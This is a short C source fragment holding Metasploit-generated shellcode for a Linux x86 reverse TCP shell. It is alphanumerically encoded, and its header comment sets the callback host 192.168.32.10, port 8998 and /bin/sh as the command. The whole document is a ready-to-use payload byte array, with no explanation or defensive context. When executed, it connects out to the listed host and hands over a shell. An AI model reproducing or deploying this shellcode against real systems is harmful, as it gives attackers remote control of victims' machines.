/*
 * linux/x86/shell_reverse_tcp - 204 bytes
 * https://metasploit.com/
 * Encoder: x86/alpha_upper
 * VERBOSE=false, LHOST=192.168.32.10, LPORT=8998, 
 * ReverseAllowProxy=false, ReverseListenerThreaded=false, 
 * StagerRetryCount=10, StagerRetryWait=5, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * MeterpreterDebugLevel=0, RemoteMeterpreterDebugFile=, 
 * CreateSession=true, AutoVerifySession=true, CMD=/bin/sh
 */
unsigned char buf[] = 
"\x89\xe1\xda\xcc\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x46\x51\x39\x4b\x4b\x47\x5a\x43\x30"
"\x53\x57\x33\x46\x33\x33\x5a\x44\x42\x4d\x59\x4b\x51\x48\x30"
"\x55\x36\x48\x4d\x4d\x50\x4a\x33\x36\x39\x48\x30\x47\x4f\x38"
"\x4d\x4d\x50\x51\x59\x43\x49\x4b\x49\x33\x58\x39\x50\x4f\x58"
"\x37\x50\x34\x4a\x45\x38\x44\x42\x53\x30\x36\x43\x57\x56\x4d"
"\x59\x4d\x31\x48\x30\x53\x56\x36\x30\x36\x31\x50\x53\x38\x33"
"\x34\x43\x4d\x59\x4d\x31\x58\x4d\x4b\x30\x50\x52\x43\x58\x52"
"\x4e\x36\x4f\x52\x53\x45\x38\x35\x38\x46\x4f\x46\x4f\x42\x42"
"\x42\x49\x4d\x59\x4b\x53\x56\x32\x36\x33\x4c\x49\x4b\x51\x4e"
"\x50\x54\x4b\x58\x4d\x4d\x50\x41\x41";